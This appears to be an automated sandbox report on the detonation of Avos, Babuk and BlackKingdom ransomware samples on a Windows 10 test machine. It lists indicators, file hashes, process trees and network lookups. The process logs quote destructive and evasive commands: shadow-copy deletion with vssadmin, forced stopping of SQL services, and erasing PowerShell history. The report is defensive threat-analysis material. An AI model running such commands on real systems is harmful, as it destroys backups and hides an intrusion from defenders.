N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

C:\Recovery\GET_YOUR_FILES_BACK.txt

MD5 0237b63f764204e00d7242cc4d908271
SHA1 9d88e59463e2a963bea95d6a2cc5383e922f2f27
SHA256 7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857
SHA512 0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e

Analysis: behavioral8

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1792s

Max time network

1151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (174) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

C:\Recovery\WindowsRE\How To Restore Your Files.txt

MD5 81fc4c91a0938482f65a72216cda1e39
SHA1 3fb3d27ceb1502ddf0d68fa9251a6aec46036377
SHA256 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591
SHA512 ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4

Analysis: behavioral10

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1800s

Max time network

1161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created F:\$RECYCLE.BIN\S-1-5-21-771719357-2485960699-3367710044-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\$Recycle.Bin\S-1-5-21-771719357-2485960699-3367710044-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4260 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 4260 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 3480 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3480 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 3760 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Service *sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell rm (Get-PSReadlineOption).HistorySavePath

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 mega.io udp
LU 66.203.124.37:80 mega.io tcp
LU 66.203.124.37:443 mega.io tcp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 37.124.203.66.in-addr.arpa udp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 15.125.203.66.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI42602\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI42602\python37.dll

MD5 c4709f84e6cf6e082b80c80b87abe551
SHA1 c0c55b229722f7f2010d34e26857df640182f796
SHA256 ca8e39f2b1d277b0a24a43b5b8eada5baf2de97488f7ef2484014df6e270b3f3
SHA512 e04a5832b9f2e1e53ba096e011367d46e6710389967fa7014a0e2d4a6ce6fc8d09d0ce20cee7e7d67d5057d37854eddab48bef7df1767f2ec3a4ab91475b7ce4

C:\Users\Admin\AppData\Local\Temp\_MEI42602\VCRUNTIME140.dll

MD5 89a24c66e7a522f1e0016b1d0b4316dc
SHA1 5340dd64cfe26e3d5f68f7ed344c4fd96fbd0d42
SHA256 3096cafb6a21b6d28cf4fe2dd85814f599412c0fe1ef090dd08d1c03affe9ab6
SHA512 e88e0459744a950829cd508a93e2ef0061293ab32facd9d8951686cbe271b34460efd159fd8ec4aa96ff8a629741006458b166e5cff21f35d049ad059bc56a1a

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ctypes.pyd

MD5 5e869eebb6169ce66225eb6725d5be4a
SHA1 747887da0d7ab152e1d54608c430e78192d5a788
